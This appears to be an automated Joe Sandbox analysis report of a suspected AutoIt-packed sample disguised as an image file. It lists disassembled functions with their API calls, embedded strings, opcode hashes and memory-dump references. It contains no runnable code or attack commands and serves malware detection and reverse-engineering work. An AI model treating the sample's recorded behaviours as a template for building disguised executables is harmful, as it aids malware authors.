Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
Instruction ID: c335266ba93614dd841c5721c06e0826944b61c9f49df59005fe05ef858116c8
Opcode Fuzzy Hash: e026b3450d42cab6215b72338e772a7f2cc0374f6541a5b3187bd443ba067c04
Instruction Fuzzy Hash: 6C113D71A00109BEEB04ABA4DD86EFF7BACEF04354F004469B546D6192EBB0AE419B50

Function 000836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000836E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00083707
ShowWindow.USER32(00000000,?,?,?,?,00083AA3,?), ref: 0008371B
ShowWindow.USER32(00000000,?,?,?,?,00083AA3,?), ref: 00083724

Strings

AutoIt v3, xrefs: 000836DE, 000836E3, 000836E4
edit, xrefs: 00083701

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
Instruction ID: 0be4dc01f3c4e24418500a23701a23722593d8dd76c571502c84cbfcee188083
Opcode Fuzzy Hash: 0e038ae00adac7c062d6d66d29399d7c9a52f1a3fcaf9bcd66c0ff59a3f3cea1
Instruction Fuzzy Hash: 4AF0DA795802D07AE7315B97BC08E673E7DE7C7F24B00002ABA04A35B0C66508D5DAB1

Function 00084139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000841A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000839FE,?,00000001), ref: 000841DB

_free.LIBCMT ref: 000F36B7
_free.LIBCMT ref: 000F36FE

Part of subcall function 0008C833: __wsplitpath.LIBCMT ref: 0008C93E
Part of subcall function 0008C833: _wcscpy.LIBCMT ref: 0008C953
Part of subcall function 0008C833: _wcscat.LIBCMT ref: 0008C968
Part of subcall function 0008C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0008C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 000F3491
Bad directive syntax error, xrefs: 000F36E4

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 48b16da823f374aab8652132b6cca50f2c565203be7ca1d493965557f1a84176
Instruction ID: 07ad89e380cffb14230e42ea89fc097fecd26146df91bd942070c4ca288c9bef
Opcode Fuzzy Hash: 48b16da823f374aab8652132b6cca50f2c565203be7ca1d493965557f1a84176
Instruction Fuzzy Hash: 2B915E71910219AFCF14EFA4CC919FEB7B4BF19320F10442AF956EB292DB30AA45DB50

Function 00F5B818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F5B708: Sleep.KERNELBASE(000001F4), ref: 00F5B719

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F5B922

Strings

QTHUUJALKN7TX0LYG, xrefs: 00F5B9A2, 00F5B9A5

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateFileSleep
String ID: QTHUUJALKN7TX0LYG
API String ID: 2694422964-2069826677
Opcode ID: 4b2693ec7935cb90b138dcdb322654c04d46a6badc97144045096976a16068f3
Instruction ID: c90850abf4f1679c84ddf9a2ceeecb24a3f13c70d5e9291461326e4ec96d8ef8
Opcode Fuzzy Hash: 4b2693ec7935cb90b138dcdb322654c04d46a6badc97144045096976a16068f3
Instruction Fuzzy Hash: 1F518131D0428DDAEF11DBA4CC55BEEBB78AF55301F104198EA09BB2C0D7791B48DBA5

Function 00084A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00085374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141148,?,000861FF,?,00000000,00000001,00000000), ref: 00085392

Part of subcall function 000849FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D

_wcscat.LIBCMT ref: 000F2D80
_wcscat.LIBCMT ref: 000F2DB5

Strings

\Include\, xrefs: 00084B0A
\, xrefs: 000F2DA2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
Instruction ID: b702fda1c5e621541e784bed729db25c55bcf70b267479477deaffad09b2ae65
Opcode Fuzzy Hash: f8a8d909a891d18396aac733142ee504b6bd7122dbb59ada3e93045726fd18b8
Instruction Fuzzy Hash: 155184B95043409FC714EF55E9818EAB7F4FF5A700B84492EF68593672EB3095C8CB52

Function 000A34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 000A34FE

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 000A3539
__wopenfile.LIBCMT ref: 000A3549

Strings

<G, xrefs: 000A34CD, 000A34F0, 000A34FC

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
Instruction ID: 40cf50764ee27dd4d265f3992693e73927b9c1a2d15094deb7fd3436b3698ba4
Opcode Fuzzy Hash: 775aa92ba00cbd43797e4c50e21667dadaea220797bb91872879c471873735df
Instruction Fuzzy Hash: 24110A70E00306DFDB61BFF49C426AE76F4AF4B350B148525F419C7182EB34CA1197A1

Function 0009D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0009D28B,SwapMouseButtons,00000004,?), ref: 0009D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0009D28B,SwapMouseButtons,00000004,?,?,?,?,0009C865), ref: 0009D2FF

Strings

Control Panel\Mouse, xrefs: 0009D2BA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
Instruction ID: bbb3eb5ae65b5749cde86fafaa9396aefe88774d7009112125bd1caa09073b23
Opcode Fuzzy Hash: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
Instruction Fuzzy Hash: 43113975655208BFDF208FA8DC84EAF7BF8EF54745F10846AF805D7110E671AE41AB60

Function 000A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 000A36B7
_memcpy_s.LIBCMT ref: 000A3729
__filbuf.LIBCMT ref: 000A37AA
_memset.LIBCMT ref: 000A37EE

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: a27e727ff90422fe22fcf1609189fe6675ca88bbf1d49f91fea7219af2b9ee2c
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: 0051C3B0A04305ABDB788FE9C8856AE77E1AF42320F24872DF825962D1D7759F508B40

Function 000CC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F

Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670

_free.LIBCMT ref: 000CC4DD
_free.LIBCMT ref: 000CC4E4
_free.LIBCMT ref: 000CC54F

Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3

_free.LIBCMT ref: 000CC557

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction ID: 6e4686f9d40fa8af3bfb10f2a5344bd4b07fc6e863fb712b65a37b5deaa2873b
Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
Instruction Fuzzy Hash: 93513EB1904219AFDB249F64DC81BEDBBB9FF48310F1040AEF25DA3242DB715A808F59

Function 000840E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F3725
GetOpenFileNameW.COMDLG32 ref: 000F376F

Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F

Part of subcall function 000840A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000840C6

Strings

X, xrefs: 000F373E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 336c63ae37b7e4701faa1b6533b4b646f673cc57494da219f04cf3ec722b9589
Instruction ID: a8602d9e86aac24d3388048eb1a43d19e2ce5e167a7e680772d79123ee0c3daf
Opcode Fuzzy Hash: 336c63ae37b7e4701faa1b6533b4b646f673cc57494da219f04cf3ec722b9589
Instruction Fuzzy Hash: E321A571A10298AFCF11EFD4D8457EE7BF8AF49304F00805AE545B7242DBB89A898F65

Function 00F5A448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00F5A48D
ExitProcess.KERNEL32(00000000), ref: 00F5A4AC

Strings

D, xrefs: 00F5A459

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
Instruction ID: 4600211d7c142cbdab5e893ab35c20295b628c45ba8cda4182f233db1e5a0453
Opcode Fuzzy Hash: 9ec10d9bb68332e7bcdb3756cd9d8bc900757a5150bae08cbb91c2426b35d2e1
Instruction Fuzzy Hash: 1EF0C9B294024CABDB60EFE0CC49FEE7778AB44701F508518BB0A9A180DA7896189B61

Function 000CC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 000CC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000CC746

Strings

aut, xrefs: 000CC740

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
Instruction ID: db001542a56d88e35cde297b4b74ea84c51ed6bda58c16b166263140b650f4c2
Opcode Fuzzy Hash: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
Instruction Fuzzy Hash: 22D05E7150030EABDB10AB90EC0EF8A776C9700708F0041A0B690A50B1DBF4E6D98B54

Function 000DF8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e458d26e71f0ad4871cbac084f83ef4fd04ea5f66891c3f7fabf241c4e210be
Instruction ID: 95e3620919444e93a824ff67ec6ccaf950f050a06c2dd3a35f0a29c48193e717
Opcode Fuzzy Hash: 2e458d26e71f0ad4871cbac084f83ef4fd04ea5f66891c3f7fabf241c4e210be
Instruction Fuzzy Hash: A1F15C716043419FCB10DF24C881BAEB7E5BF88314F14892EF9969B392DB70E945CB92

Function 000A395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 000A3973

Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81E9
Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81F3

__NMSG_WRITE.LIBCMT ref: 000A397A

Part of subcall function 000A821F: GetModuleFileNameW.KERNEL32(00000000,00140312,00000104,00000000,00000001,00000000), ref: 000A82B1
Part of subcall function 000A821F: ___crtMessageBoxW.LIBCMT ref: 000A835F

Part of subcall function 000A1145: ___crtCorExitProcess.LIBCMT ref: 000A114B
Part of subcall function 000A1145: ExitProcess.KERNEL32 ref: 000A1154

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

RtlAllocateHeap.NTDLL(00F10000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
Instruction ID: e27c56bde48800bd1663ee13a47f7b13eab6c62a0bee39abf1a08d6c3e4fec4f
Opcode Fuzzy Hash: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
Instruction Fuzzy Hash: DA01B5353453019AE6623BE9EC46BAF33889F87764F215129F5099B593DFB09D4086A0

Function 000CC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000CC385,?,?,?,?,?,00000004), ref: 000CC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000CC708
CloseHandle.KERNEL32(00000000,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC70F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
Instruction ID: d7e70f7840c2129b373f55f822a9b43c6a6bc92a0da0a66cc4332d110a120c8c
Opcode Fuzzy Hash: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
Instruction Fuzzy Hash: 6FE08632140214B7E7211B94FC09FCE7F58EB05760F104210FB54690E097F125518798

Function 000CBB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000CBB72

Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3

_free.LIBCMT ref: 000CBB83
_free.LIBCMT ref: 000CBB95

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction ID: d64c8a0b979c0af5c4737ccf97b1a01b5ace2ffe5070116dc95d19739a6e9bf7
Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
Instruction Fuzzy Hash: 64E0C7B160070082CA20A6B8AE4AFFB23CC0F05321F04080EB429E3183CF60EC4088B8

Function 00082322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 000822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000824F1), ref: 00082303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000825A1
CoInitialize.OLE32(00000000), ref: 00082618
CloseHandle.KERNEL32(00000000), ref: 000F503A

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
Instruction ID: b7d91fa9070f615a1ab30ed42d858544ddbdc26978862105c1dfb59416341604
Opcode Fuzzy Hash: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
Instruction Fuzzy Hash: 5271BFBC941381ABC704EF6AE990895BBA4FB5B3547A0462ED15AD7FB2DBB044C0CF14

Function 000CBBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 000CBC18

Strings

EA06, xrefs: 000CBC46

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
